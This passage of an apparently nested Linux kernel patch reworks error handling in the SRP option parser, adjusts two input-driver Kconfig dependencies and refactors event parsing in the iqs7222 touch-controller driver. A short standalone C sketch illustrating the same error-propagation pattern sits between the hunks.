+ 			target->scsi_host->can_queue = token;
+@@ -3490,25 +3499,40 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_MAX_CMD_PER_LUN:
+-			if (match_int(args, &token) || token < 1) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max cmd_per_lun parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1) {
+ 				pr_warn("bad max cmd_per_lun parameter '%s'\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->scsi_host->cmd_per_lun = token;
+ 			break;
+ 
+ 		case SRP_OPT_TARGET_CAN_QUEUE:
+-			if (match_int(args, &token) || token < 1) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max target_can_queue parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1) {
+ 				pr_warn("bad max target_can_queue parameter '%s'\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->target_can_queue = token;
+ 			break;
+ 
+ 		case SRP_OPT_IO_CLASS:
+-			if (match_hex(args, &token)) {
++			ret = match_hex(args, &token);
++			if (ret) {
+ 				pr_warn("bad IO class parameter '%s'\n", p);
+ 				goto out;
+ 			}
+@@ -3517,6 +3541,7 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 				pr_warn("unknown IO class parameter value %x specified (use %x or %x).\n",
+ 					token, SRP_REV10_IB_IO_CLASS,
+ 					SRP_REV16A_IB_IO_CLASS);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->io_class = token;
+@@ -3539,16 +3564,24 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_CMD_SG_ENTRIES:
+-			if (match_int(args, &token) || token < 1 || token > 255) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max cmd_sg_entries parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1 || token > 255) {
+ 				pr_warn("bad max cmd_sg_entries parameter '%s'\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->cmd_sg_cnt = token;
+ 			break;
+ 
+ 		case SRP_OPT_ALLOW_EXT_SG:
+-			if (match_int(args, &token)) {
++			ret = match_int(args, &token);
++			if (ret) {
+ 				pr_warn("bad allow_ext_sg parameter '%s'\n", p);
+ 				goto out;
+ 			}
+@@ -3556,43 +3589,77 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_SG_TABLESIZE:
+-			if (match_int(args, &token) || token < 1 ||
+-					token > SG_MAX_SEGMENTS) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max sg_tablesize parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1 || token > SG_MAX_SEGMENTS) {
+ 				pr_warn("bad max sg_tablesize parameter '%s'\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->sg_tablesize = token;
+ 			break;
+ 
+ 		case SRP_OPT_COMP_VECTOR:
+-			if (match_int(args, &token) || token < 0) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for comp_vector parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 0) {
+ 				pr_warn("bad comp_vector parameter '%s'\n", p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->comp_vector = token;
+ 			break;
+ 
+ 		case SRP_OPT_TL_RETRY_COUNT:
+-			if (match_int(args, &token) || token < 2 || token > 7) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for tl_retry_count parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 2 || token > 7) {
+ 				pr_warn("bad tl_retry_count parameter '%s' (must be a number between 2 and 7)\n",
+ 					p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->tl_retry_count = token;
+ 			break;
+ 
+ 		case SRP_OPT_MAX_IT_IU_SIZE:
+-			if (match_int(args, &token) || token < 0) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for max it_iu_size parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 0) {
+ 				pr_warn("bad maximum initiator to target IU size '%s'\n", p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->max_it_iu_size = token;
+ 			break;
+ 
+ 		case SRP_OPT_CH_COUNT:
+-			if (match_int(args, &token) || token < 1) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for channel count parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1) {
+ 				pr_warn("bad channel count %s\n", p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
+ 			target->ch_count = token;
+@@ -3601,6 +3668,7 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 		default:
+ 			pr_warn("unknown parameter or missing value '%s' in target creation request\n",
+ 				p);
++			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 	}
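
/*
 * Sketch of the parsing pattern the SRP hunks convert to: keep the
 * tokenizer's own error code when it fails, and return -EINVAL only for
 * range violations, so callers can tell the two failures apart.
 * parse_int() below is a stand-in for the kernel's match_int(), which
 * this example does not reproduce exactly.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

static int parse_int(const char *s, int *out)
{
	char *end;
	long v = strtol(s, &end, 10);

	if (end == s || *end)
		return -EINVAL;		/* tokenizer-level failure */
	*out = (int)v;
	return 0;
}

static int parse_queue_size(const char *s, int *out)
{
	int ret = parse_int(s, out);

	if (ret) {
		fprintf(stderr, "parse failed for '%s': %d\n", s, ret);
		return ret;		/* propagate, don't swallow */
	}
	if (*out < 1) {
		fprintf(stderr, "bad queue_size '%s'\n", s);
		return -EINVAL;		/* explicit range error */
	}
	return 0;
}

int main(void)
{
	int v;

	printf("%d\n", parse_queue_size("16", &v));   /* 0 */
	printf("%d\n", parse_queue_size("0", &v));    /* range error */
	printf("%d\n", parse_queue_size("abc", &v));  /* parser error */
	return 0;
}
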
+diff --git a/drivers/input/joystick/Kconfig b/drivers/input/joystick/Kconfig
+index 9dcf3f51f2dd9..04ca3d1c28162 100644
+--- a/drivers/input/joystick/Kconfig
++++ b/drivers/input/joystick/Kconfig
+@@ -46,6 +46,7 @@ config JOYSTICK_A3D
+ config JOYSTICK_ADC
+ 	tristate "Simple joystick connected over ADC"
+ 	depends on IIO
++	select IIO_BUFFER
+ 	select IIO_BUFFER_CB
+ 	help
+ 	  Say Y here if you have a simple joystick connected over ADC.
+diff --git a/drivers/input/misc/Kconfig b/drivers/input/misc/Kconfig
+index 9f088900f863b..fa942651619d2 100644
+--- a/drivers/input/misc/Kconfig
++++ b/drivers/input/misc/Kconfig
+@@ -330,7 +330,7 @@ config INPUT_CPCAP_PWRBUTTON
+ 
+ config INPUT_WISTRON_BTNS
+ 	tristate "x86 Wistron laptop button interface"
+-	depends on X86_32
++	depends on X86_32 && !UML
+ 	select INPUT_SPARSEKMAP
+ 	select NEW_LEDS
+ 	select LEDS_CLASS
+diff --git a/drivers/input/misc/iqs7222.c b/drivers/input/misc/iqs7222.c
+index ddb863bf63eec..e47ab6c1177f5 100644
+--- a/drivers/input/misc/iqs7222.c
++++ b/drivers/input/misc/iqs7222.c
+@@ -86,7 +86,9 @@ enum iqs7222_reg_key_id {
+ 	IQS7222_REG_KEY_TOUCH,
+ 	IQS7222_REG_KEY_DEBOUNCE,
+ 	IQS7222_REG_KEY_TAP,
++	IQS7222_REG_KEY_TAP_LEGACY,
+ 	IQS7222_REG_KEY_AXIAL,
++	IQS7222_REG_KEY_AXIAL_LEGACY,
+ 	IQS7222_REG_KEY_WHEEL,
+ 	IQS7222_REG_KEY_NO_WHEEL,
+ 	IQS7222_REG_KEY_RESERVED
+@@ -105,14 +107,14 @@ enum iqs7222_reg_grp_id {
+ 	IQS7222_NUM_REG_GRPS
+ };
+ 
+-static const char * const iqs7222_reg_grp_names[] = {
++static const char * const iqs7222_reg_grp_names[IQS7222_NUM_REG_GRPS] = {
+ 	[IQS7222_REG_GRP_CYCLE] = "cycle",
+ 	[IQS7222_REG_GRP_CHAN] = "channel",
+ 	[IQS7222_REG_GRP_SLDR] = "slider",
+ 	[IQS7222_REG_GRP_GPIO] = "gpio",
+ };
+ 
+-static const unsigned int iqs7222_max_cols[] = {
++static const unsigned int iqs7222_max_cols[IQS7222_NUM_REG_GRPS] = {
+ 	[IQS7222_REG_GRP_STAT] = IQS7222_MAX_COLS_STAT,
+ 	[IQS7222_REG_GRP_CYCLE] = IQS7222_MAX_COLS_CYCLE,
+ 	[IQS7222_REG_GRP_GLBL] = IQS7222_MAX_COLS_GLBL,
+@@ -202,10 +204,68 @@ struct iqs7222_dev_desc {
+ 	int allow_offset;
+ 	int event_offset;
+ 	int comms_offset;
++	bool legacy_gesture;
+ 	struct iqs7222_reg_grp_desc reg_grps[IQS7222_NUM_REG_GRPS];
+ };
+ 
+ static const struct iqs7222_dev_desc iqs7222_devs[] = {
++	{
++		.prod_num = IQS7222_PROD_NUM_A,
++		.fw_major = 1,
++		.fw_minor = 13,
++		.sldr_res = U8_MAX * 16,
++		.touch_link = 1768,
++		.allow_offset = 9,
++		.event_offset = 10,
++		.comms_offset = 12,
++		.reg_grps = {
++			[IQS7222_REG_GRP_STAT] = {
++				.base = IQS7222_SYS_STATUS,
++				.num_row = 1,
++				.num_col = 8,
++			},
++			[IQS7222_REG_GRP_CYCLE] = {
++				.base = 0x8000,
++				.num_row = 7,
++				.num_col = 3,
++			},
++			[IQS7222_REG_GRP_GLBL] = {
++				.base = 0x8700,
++				.num_row = 1,
++				.num_col = 3,
++			},
++			[IQS7222_REG_GRP_BTN] = {
++				.base = 0x9000,
++				.num_row = 12,
++				.num_col = 3,
++			},
++			[IQS7222_REG_GRP_CHAN] = {
++				.base = 0xA000,
++				.num_row = 12,
++				.num_col = 6,
++			},
++			[IQS7222_REG_GRP_FILT] = {
++				.base = 0xAC00,
++				.num_row = 1,
++				.num_col = 2,
++			},
++			[IQS7222_REG_GRP_SLDR] = {
++				.base = 0xB000,
++				.num_row = 2,
++				.num_col = 11,
++			},
++			[IQS7222_REG_GRP_GPIO] = {
++				.base = 0xC000,
++				.num_row = 1,
++				.num_col = 3,
++			},
++			[IQS7222_REG_GRP_SYS] = {
++				.base = IQS7222_SYS_SETUP,
++				.num_row = 1,
++				.num_col = 13,
++			},
++		},
++	},
+ 	{
+ 		.prod_num = IQS7222_PROD_NUM_A,
+ 		.fw_major = 1,
+@@ -215,6 +275,7 @@ static const struct iqs7222_dev_desc iqs7222_devs[] = {
+ 		.allow_offset = 9,
+ 		.event_offset = 10,
+ 		.comms_offset = 12,
++		.legacy_gesture = true,
+ 		.reg_grps = {
+ 			[IQS7222_REG_GRP_STAT] = {
+ 				.base = IQS7222_SYS_STATUS,
+@@ -874,6 +935,16 @@ static const struct iqs7222_prop_desc iqs7222_props[] = {
+ 		.reg_offset = 9,
+ 		.reg_shift = 8,
+ 		.reg_width = 8,
++		.val_pitch = 16,
++		.label = "maximum gesture time",
++	},
++	{
++		.name = "azoteq,gesture-max-ms",
++		.reg_grp = IQS7222_REG_GRP_SLDR,
++		.reg_key = IQS7222_REG_KEY_TAP_LEGACY,
++		.reg_offset = 9,
++		.reg_shift = 8,
++		.reg_width = 8,
+ 		.val_pitch = 4,
+ 		.label = "maximum gesture time",
+ 	},
+@@ -884,6 +955,16 @@ static const struct iqs7222_prop_desc iqs7222_props[] = {
+ 		.reg_offset = 9,
+ 		.reg_shift = 3,
+ 		.reg_width = 5,
++		.val_pitch = 16,
++		.label = "minimum gesture time",
++	},
++	{
++		.name = "azoteq,gesture-min-ms",
++		.reg_grp = IQS7222_REG_GRP_SLDR,
++		.reg_key = IQS7222_REG_KEY_TAP_LEGACY,
++		.reg_offset = 9,
++		.reg_shift = 3,
++		.reg_width = 5,
+ 		.val_pitch = 4,
+ 		.label = "minimum gesture time",
+ 	},
+@@ -897,6 +978,16 @@ static const struct iqs7222_prop_desc iqs7222_props[] = {
+ 		.val_pitch = 16,
+ 		.label = "gesture distance",
+ 	},
++	{
++		.name = "azoteq,gesture-dist",
++		.reg_grp = IQS7222_REG_GRP_SLDR,
++		.reg_key = IQS7222_REG_KEY_AXIAL_LEGACY,
++		.reg_offset = 10,
++		.reg_shift = 8,
++		.reg_width = 8,
++		.val_pitch = 16,
++		.label = "gesture distance",
++	},
+ 	{
+ 		.name = "azoteq,gesture-max-ms",
+ 		.reg_grp = IQS7222_REG_GRP_SLDR,
+@@ -904,6 +995,16 @@ static const struct iqs7222_prop_desc iqs7222_props[] = {
+ 		.reg_offset = 10,
+ 		.reg_shift = 0,
+ 		.reg_width = 8,
++		.val_pitch = 16,
++		.label = "maximum gesture time",
++	},
++	{
++		.name = "azoteq,gesture-max-ms",
++		.reg_grp = IQS7222_REG_GRP_SLDR,
++		.reg_key = IQS7222_REG_KEY_AXIAL_LEGACY,
++		.reg_offset = 10,
++		.reg_shift = 0,
++		.reg_width = 8,
+ 		.val_pitch = 4,
+ 		.label = "maximum gesture time",
+ 	},
+@@ -1567,56 +1668,17 @@ static int iqs7222_gpio_select(struct iqs7222_private *iqs7222,
+ }
+ 
+ static int iqs7222_parse_props(struct iqs7222_private *iqs7222,
+-			       struct fwnode_handle **child_node,
+-			       int child_index,
++			       struct fwnode_handle *reg_grp_node,
++			       int reg_grp_index,
+ 			       enum iqs7222_reg_grp_id reg_grp,
+ 			       enum iqs7222_reg_key_id reg_key)
+ {
+-	u16 *setup = iqs7222_setup(iqs7222, reg_grp, child_index);
++	u16 *setup = iqs7222_setup(iqs7222, reg_grp, reg_grp_index);
+ 	struct i2c_client *client = iqs7222->client;
+-	struct fwnode_handle *reg_grp_node;
+-	char reg_grp_name[16];
+ 	int i;
+ 
+-	switch (reg_grp) {
+-	case IQS7222_REG_GRP_CYCLE:
+-	case IQS7222_REG_GRP_CHAN:
+-	case IQS7222_REG_GRP_SLDR:
+-	case IQS7222_REG_GRP_GPIO:
+-	case IQS7222_REG_GRP_BTN:
+-		/*
+-		 * These groups derive a child node and return it to the caller
+-		 * for additional group-specific processing. In some cases, the
+-		 * child node may have already been derived.
+-		 */
+-		reg_grp_node = *child_node;
+-		if (reg_grp_node)
+-			break;
+-
+-		snprintf(reg_grp_name, sizeof(reg_grp_name), "%s-%d",
+-			 iqs7222_reg_grp_names[reg_grp], child_index);
+-
+-		reg_grp_node = device_get_named_child_node(&client->dev,
+-							   reg_grp_name);
+-		if (!reg_grp_node)
+-			return 0;
+-
+-		*child_node = reg_grp_node;
+-		break;
+-
+-	case IQS7222_REG_GRP_GLBL:
+-	case IQS7222_REG_GRP_FILT:
+-	case IQS7222_REG_GRP_SYS:
+-		/*
+-		 * These groups are not organized beneath a child node, nor are
+-		 * they subject to any additional processing by the caller.
+-		 */
+-		reg_grp_node = dev_fwnode(&client->dev);
+-		break;
+-
+-	default:
+-		return -EINVAL;
+-	}
++	if (!setup)
++		return 0;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(iqs7222_props); i++) {
+ 		const char *name = iqs7222_props[i].name;
+@@ -1686,11 +1748,66 @@ static int iqs7222_parse_props(struct iqs7222_private *iqs7222,
+ 	return 0;
+ }
+ 
+-static int iqs7222_parse_cycle(struct iqs7222_private *iqs7222, int cycle_index)
++static int iqs7222_parse_event(struct iqs7222_private *iqs7222,
++			       struct fwnode_handle *event_node,
++			       int reg_grp_index,
++			       enum iqs7222_reg_grp_id reg_grp,
++			       enum iqs7222_reg_key_id reg_key,
++			       u16 event_enable, u16 event_link,
++			       unsigned int *event_type,
++			       unsigned int *event_code)
++{
++	struct i2c_client *client = iqs7222->client;
++	int error;
++
++	error = iqs7222_parse_props(iqs7222, event_node, reg_grp_index,
++				    reg_grp, reg_key);
++	if (error)
++		return error;
++
++	error = iqs7222_gpio_select(iqs7222, event_node, event_enable,
++				    event_link);
++	if (error)
++		return error;
++
++	error = fwnode_property_read_u32(event_node, "linux,code", event_code);
++	if (error == -EINVAL) {
++		return 0;
++	} else if (error) {
++		dev_err(&client->dev, "Failed to read %s code: %d\n",
++			fwnode_get_name(event_node), error);
++		return error;
++	}
++
++	if (!event_type) {
++		input_set_capability(iqs7222->keypad, EV_KEY, *event_code);
++		return 0;
++	}
++
++	error = fwnode_property_read_u32(event_node, "linux,input-type",
++					 event_type);
++	if (error == -EINVAL) {
++		*event_type = EV_KEY;
++	} else if (error) {
++		dev_err(&client->dev, "Failed to read %s input type: %d\n",
++			fwnode_get_name(event_node), error);
++		return error;
++	} else if (*event_type != EV_KEY && *event_type != EV_SW) {
++		dev_err(&client->dev, "Invalid %s input type: %d\n",
++			fwnode_get_name(event_node), *event_type);
++		return -EINVAL;
++	}
++
++	input_set_capability(iqs7222->keypad, *event_type, *event_code);
++
++	return 0;
++}
++
++static int iqs7222_parse_cycle(struct iqs7222_private *iqs7222,
++			       struct fwnode_handle *cycle_node, int cycle_index)
+ {
+ 	u16 *cycle_setup = iqs7222->cycle_setup[cycle_index];
+ 	struct i2c_client *client = iqs7222->client;
+-	struct fwnode_handle *cycle_node = NULL;
+ 	unsigned int pins[9];
+ 	int error, count, i;
+ 
+@@ -1698,17 +1815,7 @@ static int iqs7222_parse_cycle(struct iqs7222_private *iqs7222, int cycle_index)
+ 	 * Each channel shares a cycle with one other channel; the mapping of
+ 	 * channels to cycles is fixed. Properties defined for a cycle impact
+ 	 * both channels tied to the cycle.
+-	 */
+-	error = iqs7222_parse_props(iqs7222, &cycle_node, cycle_index,
+-				    IQS7222_REG_GRP_CYCLE,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+-	if (!cycle_node)
+-		return 0;
+-
+-	/*
++	 *
+ 	 * Unlike channels which are restricted to a select range of CRx pins
+ 	 * based on channel number, any cycle can claim any of the device's 9
+ 	 * CTx pins (CTx0-8).
+@@ -1750,11 +1857,11 @@ static int iqs7222_parse_cycle(struct iqs7222_private *iqs7222, int cycle_index)
+ 	return 0;
+ }
+ 
+-static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
++static int iqs7222_parse_chan(struct iqs7222_private *iqs7222,
++			      struct fwnode_handle *chan_node, int chan_index)
+ {
+ 	const struct iqs7222_dev_desc *dev_desc = iqs7222->dev_desc;
+ 	struct i2c_client *client = iqs7222->client;
+-	struct fwnode_handle *chan_node = NULL;
+ 	int num_chan = dev_desc->reg_grps[IQS7222_REG_GRP_CHAN].num_row;
+ 	int ext_chan = rounddown(num_chan, 10);
+ 	int error, i;
+@@ -1762,15 +1869,6 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 	u16 *sys_setup = iqs7222->sys_setup;
+ 	unsigned int val;
+ 
+-	error = iqs7222_parse_props(iqs7222, &chan_node, chan_index,
+-				    IQS7222_REG_GRP_CHAN,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+-	if (!chan_node)
+-		return 0;
+-
+ 	if (dev_desc->allow_offset &&
+ 	    fwnode_property_present(chan_node, "azoteq,ulp-allow"))
+ 		sys_setup[dev_desc->allow_offset] &= ~BIT(chan_index);
+@@ -1810,8 +1908,9 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 		chan_setup[0] |= IQS7222_CHAN_SETUP_0_REF_MODE_FOLLOW;
+ 		chan_setup[4] = val * 42 + 1048;
+ 
+-		if (!fwnode_property_read_u32(chan_node, "azoteq,ref-weight",
+-					      &val)) {
++		error = fwnode_property_read_u32(chan_node, "azoteq,ref-weight",
++						 &val);
++		if (!error) {
+ 			if (val > U16_MAX) {
+ 				dev_err(&client->dev,
+ 					"Invalid %s reference weight: %u\n",
+@@ -1820,6 +1919,11 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 			}
+ 
+ 			chan_setup[5] = val;
++		} else if (error != -EINVAL) {
++			dev_err(&client->dev,
++				"Failed to read %s reference weight: %d\n",
++				fwnode_get_name(chan_node), error);
++			return error;
+ 		}
+ 
+ 		/*
+@@ -1892,21 +1996,10 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 		if (!event_node)
+ 			continue;
+ 
+-		error = iqs7222_parse_props(iqs7222, &event_node, chan_index,
+-					    IQS7222_REG_GRP_BTN,
+-					    iqs7222_kp_events[i].reg_key);
+-		if (error)
+-			return error;
+-
+-		error = iqs7222_gpio_select(iqs7222, event_node,
+-					    BIT(chan_index),
+-					    dev_desc->touch_link - (i ? 0 : 2));
+-		if (error)
+-			return error;
+-
+-		if (!fwnode_property_read_u32(event_node,
+-					      "azoteq,timeout-press-ms",
+-					      &val)) {
++		error = fwnode_property_read_u32(event_node,
++						 "azoteq,timeout-press-ms",
++						 &val);
++		if (!error) {
+ 			/*
+ 			 * The IQS7222B employs a global pair of press timeout
+ 			 * registers as opposed to channel-specific registers.
+@@ -1919,57 +2012,31 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 			if (val > U8_MAX * 500) {
+ 				dev_err(&client->dev,
+ 					"Invalid %s press timeout: %u\n",
+-					fwnode_get_name(chan_node), val);
++					fwnode_get_name(event_node), val);
++				fwnode_handle_put(event_node);
+ 				return -EINVAL;
+ 			}
+ 
+ 			*setup &= ~(U8_MAX << i * 8);
+ 			*setup |= (val / 500 << i * 8);
+-		}
+-
+-		error = fwnode_property_read_u32(event_node, "linux,code",
+-						 &val);
+-		if (error) {
+-			dev_err(&client->dev, "Failed to read %s code: %d\n",
+-				fwnode_get_name(chan_node), error);
++		} else if (error != -EINVAL) {
++			dev_err(&client->dev,
++				"Failed to read %s press timeout: %d\n",
++				fwnode_get_name(event_node), error);
++			fwnode_handle_put(event_node);
+ 			return error;
+ 		}
+ 
+-		iqs7222->kp_code[chan_index][i] = val;
+-		iqs7222->kp_type[chan_index][i] = EV_KEY;
+-
+-		if (fwnode_property_present(event_node, "linux,input-type")) {
+-			error = fwnode_property_read_u32(event_node,
+-							 "linux,input-type",
+-							 &val);
+-			if (error) {
+-				dev_err(&client->dev,
+-					"Failed to read %s input type: %d\n",
+-					fwnode_get_name(chan_node), error);
+-				return error;
+-			}
+-
+-			if (val != EV_KEY && val != EV_SW) {
+-				dev_err(&client->dev,
+-					"Invalid %s input type: %u\n",
+-					fwnode_get_name(chan_node), val);
+-				return -EINVAL;
+-			}
+-
+-			iqs7222->kp_type[chan_index][i] = val;
+-		}
+-
+-		/*
+-		 * Reference channels can opt out of event reporting by using
+-		 * KEY_RESERVED in place of a true key or switch code.
+-		 */
+-		if (iqs7222->kp_type[chan_index][i] == EV_KEY &&
+-		    iqs7222->kp_code[chan_index][i] == KEY_RESERVED)
+-			continue;
+-
+-		input_set_capability(iqs7222->keypad,
+-				     iqs7222->kp_type[chan_index][i],
+-				     iqs7222->kp_code[chan_index][i]);
++		error = iqs7222_parse_event(iqs7222, event_node, chan_index,
++					    IQS7222_REG_GRP_BTN,
++					    iqs7222_kp_events[i].reg_key,
++					    BIT(chan_index),
++					    dev_desc->touch_link - (i ? 0 : 2),
++					    &iqs7222->kp_type[chan_index][i],
++					    &iqs7222->kp_code[chan_index][i]);
++		fwnode_handle_put(event_node);
++		if (error)
++			return error;
+ 
+ 		if (!dev_desc->event_offset)
+ 			continue;
+@@ -1981,16 +2048,16 @@ static int iqs7222_parse_chan(struct iqs7222_private *iqs7222, int chan_index)
+ 	 * The following call handles a special pair of properties that apply
+ 	 * to a channel node, but reside within the button (event) group.
+ 	 */
+-	return iqs7222_parse_props(iqs7222, &chan_node, chan_index,
++	return iqs7222_parse_props(iqs7222, chan_node, chan_index,
+ 				   IQS7222_REG_GRP_BTN,
+ 				   IQS7222_REG_KEY_DEBOUNCE);
+ }
+ 
+-static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
++static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222,
++			      struct fwnode_handle *sldr_node, int sldr_index)
+ {
+ 	const struct iqs7222_dev_desc *dev_desc = iqs7222->dev_desc;
+ 	struct i2c_client *client = iqs7222->client;
+-	struct fwnode_handle *sldr_node = NULL;
+ 	int num_chan = dev_desc->reg_grps[IQS7222_REG_GRP_CHAN].num_row;
+ 	int ext_chan = rounddown(num_chan, 10);
+ 	int count, error, reg_offset, i;
+@@ -1998,15 +2065,6 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 	u16 *sldr_setup = iqs7222->sldr_setup[sldr_index];
+ 	unsigned int chan_sel[4], val;
+ 
+-	error = iqs7222_parse_props(iqs7222, &sldr_node, sldr_index,
+-				    IQS7222_REG_GRP_SLDR,
+-				    IQS7222_REG_KEY_NONE);
+-	if (error)
+-		return error;
+-
+-	if (!sldr_node)
+-		return 0;
+-
+ 	/*
+ 	 * Each slider can be spread across 3 to 4 channels. It is possible to
+ 	 * select only 2 channels, but doing so prevents the slider from using
+@@ -2065,8 +2123,9 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 	if (fwnode_property_present(sldr_node, "azoteq,use-prox"))
+ 		sldr_setup[4 + reg_offset] -= 2;
+ 
+-	if (!fwnode_property_read_u32(sldr_node, "azoteq,slider-size", &val)) {
+-		if (!val || val > dev_desc->sldr_res) {
++	error = fwnode_property_read_u32(sldr_node, "azoteq,slider-size", &val);
++	if (!error) {
++		if (val > dev_desc->sldr_res) {
+ 			dev_err(&client->dev, "Invalid %s size: %u\n",
+ 				fwnode_get_name(sldr_node), val);
+ 			return -EINVAL;
+@@ -2079,9 +2138,21 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 			sldr_setup[2] |= (val / 16 <<
+ 					  IQS7222_SLDR_SETUP_2_RES_SHIFT);
+ 		}
++	} else if (error != -EINVAL) {
++		dev_err(&client->dev, "Failed to read %s size: %d\n",
++			fwnode_get_name(sldr_node), error);
++		return error;
+ 	}
+ 
+-	if (!fwnode_property_read_u32(sldr_node, "azoteq,top-speed", &val)) {
++	if (!(reg_offset ? sldr_setup[3]
++			 : sldr_setup[2] & IQS7222_SLDR_SETUP_2_RES_MASK)) {
++		dev_err(&client->dev, "Undefined %s size\n",
++			fwnode_get_name(sldr_node));
++		return -EINVAL;
++	}
++
++	error = fwnode_property_read_u32(sldr_node, "azoteq,top-speed", &val);
++	if (!error) {
+ 		if (val > (reg_offset ? U16_MAX : U8_MAX * 4)) {
+ 			dev_err(&client->dev, "Invalid %s top speed: %u\n",
+ 				fwnode_get_name(sldr_node), val);
+@@ -2094,9 +2165,14 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 			sldr_setup[2] &= ~IQS7222_SLDR_SETUP_2_TOP_SPEED_MASK;
+ 			sldr_setup[2] |= (val / 4);
+ 		}
++	} else if (error != -EINVAL) {
++		dev_err(&client->dev, "Failed to read %s top speed: %d\n",
++			fwnode_get_name(sldr_node), error);
++		return error;
+ 	}
+ 
+-	if (!fwnode_property_read_u32(sldr_node, "linux,axis", &val)) {
++	error = fwnode_property_read_u32(sldr_node, "linux,axis", &val);
++	if (!error) {
+ 		u16 sldr_max = sldr_setup[3] - 1;
+ 
+ 		if (!reg_offset) {
+@@ -2110,6 +2186,10 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 
+ 		input_set_abs_params(iqs7222->keypad, val, 0, sldr_max, 0, 0);
+ 		iqs7222->sl_axis[sldr_index] = val;
++	} else if (error != -EINVAL) {
++		dev_err(&client->dev, "Failed to read %s axis: %d\n",
++			fwnode_get_name(sldr_node), error);
++		return error;
+ 	}
+ 
+ 	if (dev_desc->wheel_enable) {
+@@ -2130,46 +2210,47 @@ static int iqs7222_parse_sldr(struct iqs7222_private *iqs7222, int sldr_index)
+ 	for (i = 0; i < ARRAY_SIZE(iqs7222_sl_events); i++) {
+ 		const char *event_name = iqs7222_sl_events[i].name;
+ 		struct fwnode_handle *event_node;
++		enum iqs7222_reg_key_id reg_key;
+ 
+ 		event_node = fwnode_get_named_child_node(sldr_node, event_name);
+ 		if (!event_node)
+ 			continue;
+ 
+-		error = iqs7222_parse_props(iqs7222, &event_node, sldr_index,
+-					    IQS7222_REG_GRP_SLDR,
+-					    reg_offset ?
+-					    IQS7222_REG_KEY_RESERVED :
+-					    iqs7222_sl_events[i].reg_key);
+-		if (error)
+-			return error;
++		/*
++		 * Depending on the device, gestures are either offered using
++		 * one of two timing resolutions, or are not supported at all.
++		 */
++		if (reg_offset)
++			reg_key = IQS7222_REG_KEY_RESERVED;
++		else if (dev_desc->legacy_gesture &&
++			 iqs7222_sl_events[i].reg_key == IQS7222_REG_KEY_TAP)
++			reg_key = IQS7222_REG_KEY_TAP_LEGACY;
++		else if (dev_desc->legacy_gesture &&
++			 iqs7222_sl_events[i].reg_key == IQS7222_REG_KEY_AXIAL)
++			reg_key = IQS7222_REG_KEY_AXIAL_LEGACY;
++		else
++			reg_key = iqs7222_sl_events[i].reg_key;
+ 
+ 		/*
+ 		 * The press/release event does not expose a direct GPIO link,
+ 		 * but one can be emulated by tying each of the participating
+ 		 * channels to the same GPIO.
+ 		 */
+-		error = iqs7222_gpio_select(iqs7222, event_node,
++		error = iqs7222_parse_event(iqs7222, event_node, sldr_index,
++					    IQS7222_REG_GRP_SLDR, reg_key,
+ 					    i ? iqs7222_sl_events[i].enable
+ 					      : sldr_setup[3 + reg_offset],
+ 					    i ? 1568 + sldr_index * 30
+-					      : sldr_setup[4 + reg_offset]);
